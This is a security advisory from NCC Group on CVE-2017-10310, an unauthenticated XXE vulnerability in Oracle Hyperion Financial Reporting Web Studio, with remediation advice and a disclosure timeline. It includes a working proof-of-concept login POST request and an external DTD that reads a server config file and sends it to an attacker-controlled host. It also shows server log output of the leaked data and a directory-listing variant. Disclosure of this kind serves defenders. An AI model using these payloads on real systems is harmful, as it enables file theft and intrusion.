Unauthenticated XML eXternal Entity (XXE) vulnerability

Vendor: Oracle
Vendor URL: http://www.oracle.com/ 
Versions affected: (previous versions may also be affected)
Systems Affected: Oracle Hyperion Financial Reporting Web Studio
Author: Mathew Nash Mathew.Nash[at]nccgroup[dot]trust, Fabio Pires Fabio.pires[at]nccgroup[dot]trust
Advisory URL: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 
CVE Identifier: CVE-2017-10310
Risk: High (Unauthenticated local file read, server-side request forgery or denial of service)


The XML parser of the Oracle Hyperion Financial Reporting Web Studio is configured to process a document type definition (DTD) provided by users. This allows unauthenticated attackers to exploit this misconfiguration in the XML processor and read arbitrary files on the host system. In addition, it is also possible to obtain directory listings, perform server-side requests or cause a denial of service by using different variations of the payload.


A vulnerable endpoint was found in the log in page of the Oracle Hyperion Financial Reporting Web Studio.


The confidentially of the system can be highly affected. As this is a POST request against the log in endpoint, most servers may not be configured to perform logging of the POST data; also, as this is an unauthenticated attack, it would be hard to find evidence of this attack occurring and the information obtained via successful exploitation. 


The following POST request shows an example of how the vulnerability might be exploited:

POST /frdesigner/faces/login?_adf.ctrl-state=9p4b9h3ea_4 HTTP/1.1
Host: <application host>
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
pt_sf1:domainIpTxt=&pt_sf1:userIpTxt=AAAAAAAAAAAAAA&pt_sf1:passwdIpTxt=AAAAAAAAAAAAAA&pt_sf1:soc1=29&it1=&ins1=1&ic1=&iclov1=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!1191fgdbmc&event=pt_sf1:authBtn&event.pt_sf1:authBtn=<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER_IP_ADDRESS/xxe_file"> %pe; %param1; %external;]><m xmlns="http://oracle.com/richClient/comm"><k v="type"><s>action</s></k></m>

Before submitting the request, a DTD identified by the name ‘xxe_file’ can created in the attacker’s machine with the content below:

<!ENTITY % payload SYSTEM "file:///d:\\Oracle\\Middleware\\user_projects\\domains\\EPMSystem\\config\\config.xml">
<!ENTITY % param1 "<!ENTITY &#x25; external SYSTEM 'http://ATTACKERS_IP_ADDRESS/log_xxe?data=%payload;'>">

After the request is submitted, a connection from the server is seen to be made against the ATTACKER_IP_ADDRESS providing the content of the ‘config.xml’ in the query string of the request, as evidenced below:

$ python –m SimpleHTTPserver 80
[server_ip] - - [30/Mar/2017 15:27:23] "GET /log_xxe?data=<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<sec:authentication-provider xsi:type="wls:default-authenticatorType">

It is also possible to list files and directories located in the local filesystem by changing the value of the entity ‘payload’ to a path similar to the below:

<!ENTITY % payload SYSTEM "file:///d:\\Oracle\\Middleware\\user_projects\\domains\\EPMSystem\\">


Oracle have released a patch for this vulnerability which should be applied:

The implementation of the XML processor should be reviewed and consideration should be given to disabling entity definition parsing. The application should be reconfigured so it does not allow users to inject arbitrary code in the XML document’s preamble. The XML processor should also be configured to use a local static DTD and disallow any declared DTD included in the XML document.

Vendor communication

Advisory reported to Oracle: 31/03/2017
Oracle acknowledgement: 04/03/2017
Oracle requested more details: 06/04/2017
Details provided: 07/04/2017
Oracle status report (Issue fixed in main codeline): 25/04/2017
Patch released: 17/10/2017

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the internet safer and revolutionising the way in which organisations think about cybersecurity.

Written by: Fabio Pires

Published date:  03 November 2017

comments powered by Disqus

Filter By Service

Filter By Type